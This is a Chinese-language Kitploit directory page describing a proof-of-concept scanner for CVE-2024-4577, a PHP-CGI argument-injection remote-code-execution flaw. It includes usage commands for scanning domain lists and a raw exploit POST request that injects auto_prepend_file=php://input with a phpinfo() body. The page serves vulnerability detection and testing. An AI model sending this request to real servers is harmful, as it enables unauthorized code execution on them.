Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4577-PHP-RCE — 用 bash、go、python 和 nuclei 模板编写的 PHP RCE PoC,针对 CVE-2024-4577 | Kitploit
工具/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

用 bash、go、python 和 nuclei 模板编写的 PHP RCE PoC,针对 CVE-2024-4577

查看仓库
331321天前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PHP RCE PoC

CVE-2024-4577:PHP-CGI 中的参数注入漏洞

概述

本仓库包含用于检测 CVE-2024-4577 漏洞(PHP-CGI 中的参数注入问题)的脚本。您可以使用提供的 Bash、Go 和 Python 脚本对域名列表进行漏洞测试。此外,我还发布了一个 Nuclei YAML 模板。

使用方法

Bash 脚本

使用 Bash 脚本,运行以下命令:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Go 脚本

首先,将 Go 脚本保存为名为 CVE-2024-4577.go 的文件。编译并运行 Go 脚本:

  1. 将 Go 脚本编译为二进制文件:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  2. 使用域名列表文件作为参数运行二进制文件:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    

Python 脚本

首先,将 Python 脚本保存为名为 CVE-2024-4577.py 的文件。运行 Python 脚本:

  1. 确保已安装 requests 库:

    root@kitploit:~
    pip install requests
    
  2. 使用域名列表文件作为参数运行 Python 脚本:

    root@kitploit:~
    python CVE-2024-4577.py /path/to/domains-list
    
  3. (可选)若只想打印存在漏洞的主机:

    root@kitploit:~
    python CVE-2024-4577.py /path/to/domains-list --quiet
    

概念验证(PoC)说明

要手动测试漏洞,可发送以下 POST 请求:

root@kitploit:~
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Nuclei 模板

我还创建了一个 Nuclei 模板用于扫描存在漏洞的实例,该模板采用 v3 布局方案,并已在实验室环境中测试:

root@kitploit:~
nuclei -t CVE-2024-4577.yaml -u <target-url>

域名列表示例

域名列表应预先添加 http/https 前缀以确保正确读取。

root@kitploit:~
http://example.com
http://testsite.com
http://vulnerablesite.com

示例输出

如果发现某域名存在漏洞,输出如下:

root@kitploit:~
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
下载工具